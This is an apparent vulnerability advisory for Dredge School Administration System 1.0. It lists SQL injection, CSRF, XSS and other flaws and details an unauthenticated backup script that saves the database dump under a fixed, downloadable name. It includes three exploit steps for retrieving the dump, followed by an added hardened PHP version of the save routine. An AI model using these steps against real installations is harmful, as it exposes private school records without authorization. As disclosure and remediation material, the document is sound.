source: https://www.securityfocus.com/bid/64720/info

Dredge School Administration System is prone to the following security vulnerabilities:

1. An SQL-injection vulnerability
2. A cross-site request forgery vulnerability
3. A cross-site scripting vulnerability
4. An information-disclosure vulnerability
5. A security-bypass vulnerability

Exploiting these issues could allow an attacker to execute arbitrary script code, steal cookie-based authentication credentials, compromise the application, access or modify data, exploit latent vulnerabilities in the underlying database, obtain sensitive information or bypass certain security restrictions to perform unauthorized actions.

Dredge School Administration System 1.0 is vulnerable; other versions may also be affected.

II. Backup Download

##############
VULNERABILITY
##############

/Backup/processbackup.php (LINE: 89-93)

-----------------------------------------------------------------------------
//save file
// $handle = fopen('db-backup-'.time().'-'.(md5(implode(',',$tables))).'.sql','w+');
$handle = fopen('RecordManager.sql','w+');
fwrite($handle,$return);
fclose($handle);
-----------------------------------------------------------------------------

#####################################################
EXPLOIT
#####################################################

1. Open http://www.example.com/DSM/Backup/processbackup.php
2. Opening the link produces RecordManager.sql
3. Download the backup from http://www.example.com/DSM/Backup/RecordManager.sql
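
A hardened form of the "save file" step shown above, as an added example that is not part of the original advisory or the Dredge code. It assumes a hypothetical save_backup() helper, a backup directory outside the web root (/var/backups/dsm) and a hypothetical $_SESSION['is_admin'] flag set at login.

```php
<?php
declare(strict_types=1);

// Added example, not Dredge code. Assumed names: save_backup(),
// /var/backups/dsm and the $_SESSION['is_admin'] flag.

function save_backup(string $sqlDump, string $backupDir): string
{
    // Keep dumps outside the document root so no URL maps to them.
    if (!is_dir($backupDir) && !mkdir($backupDir, 0700, true)) {
        throw new RuntimeException('cannot create backup directory');
    }

    // Unpredictable name: 128 bits from the CSPRNG instead of a fixed string.
    $name = sprintf('db-backup-%s-%s.sql', gmdate('Ymd\THis\Z'), bin2hex(random_bytes(16)));
    $path = rtrim($backupDir, '/') . '/' . $name;

    // Mode 'x' fails if the path exists, so no file or symlink is overwritten;
    // the umask makes the new file readable by the service account only.
    $oldMask = umask(0077);
    $handle = fopen($path, 'xb');
    umask($oldMask);
    if ($handle === false) {
        throw new RuntimeException('cannot create backup file');
    }

    try {
        if (fwrite($handle, $sqlDump) !== strlen($sqlDump)) {
            throw new RuntimeException('short write while saving backup');
        }
    } finally {
        fclose($handle);
    }
    return $path;
}

// Caller side: only a logged-in administrator may trigger a backup.
session_start();
if (empty($_SESSION['is_admin'])) {   // hypothetical flag set at login
    http_response_code(403);
    exit('Forbidden');
}

$return = $return ?? '';   // the SQL dump built earlier in processbackup.php
$path = save_backup($return, '/var/backups/dsm');
error_log('backup written to ' . $path);   // path goes to the log, not the response
```

Any RecordManager.sql already left in the Backup directory by the original code stays downloadable until it is deleted.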